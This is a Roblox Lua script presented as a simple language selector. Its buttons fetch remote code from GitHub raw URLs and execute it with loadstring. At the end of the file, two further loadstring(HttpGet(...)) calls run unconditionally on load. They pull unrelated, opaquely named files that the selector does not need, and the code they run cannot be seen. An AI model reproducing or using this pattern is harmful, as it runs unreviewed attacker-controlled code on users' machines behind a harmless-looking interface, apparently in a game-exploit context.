--== Seletor de Idioma Simples ==--

local Player = game.Players.LocalPlayer
local Gui = Instance.new("ScreenGui", Player:WaitForChild("PlayerGui"))
Gui.Name = "LangSelect"

local Frame = Instance.new("Frame", Gui)
Frame.Size = UDim2.new(0, 220, 0, 120)
Frame.Position = UDim2.new(0.5, -110, 0.5, -60)
Frame.BackgroundColor3 = Color3.fromRGB(40,40,40)
Frame.BorderSizePixel = 0

local Title = Instance.new("TextLabel", Frame)
Title.Size = UDim2.new(1, 0, 0, 30)
Title.BackgroundTransparency = 1
Title.Text = "Select Language"
Title.TextColor3 = Color3.new(1,1,1)
Title.Font = Enum.Font.SourceSansBold
Title.TextSize = 20

local Brazil = Instance.new("TextButton", Frame)
Brazil.Size = UDim2.new(0.45, 0, 0.4, 0)
Brazil.Position = UDim2.new(0.05, 0, 0.45, 0)
Brazil.BackgroundColor3 = Color3.fromRGB(0,170,0)
Brazil.Text = "Brazil"
Brazil.TextColor3 = Color3.new(1,1,1)
Brazil.Font = Enum.Font.SourceSansBold
Brazil.TextSize = 18
Brazil.BorderSizePixel = 0

local English = Instance.new("TextButton", Frame)
English.Size = UDim2.new(0.45, 0, 0.4, 0)
English.Position = UDim2.new(0.5, 0, 0.45, 0)
English.BackgroundColor3 = Color3.fromRGB(0,100,255)
English.Text = "English"
English.TextColor3 = Color3.new(1,1,1)
English.Font = Enum.Font.SourceSansBold
English.TextSize = 18
English.BorderSizePixel = 0

-- portugues
Brazil.MouseButton1Click:Connect(function()
	-- sla
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Cat558-uz/Load-Bro-pt-/refs/heads/main/Pt"))()
	Gui:Destroy()
end)

English.MouseButton1Click:Connect(function()
	-- engles

loadstring(game:HttpGet("https://raw.githubusercontent.com/Cat558-uz/Load-Bro-ENG/refs/heads/main/En"))()
	Gui:Destroy()
end)

loadstring(game:HttpGet("https://raw.githubusercontent.com/Cat558-uz/Eiei/refs/heads/main/520dffc3274a9d5e.lua.txt", true))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/Cat558-uz/Wish/refs/heads/main/Iidj", true))()

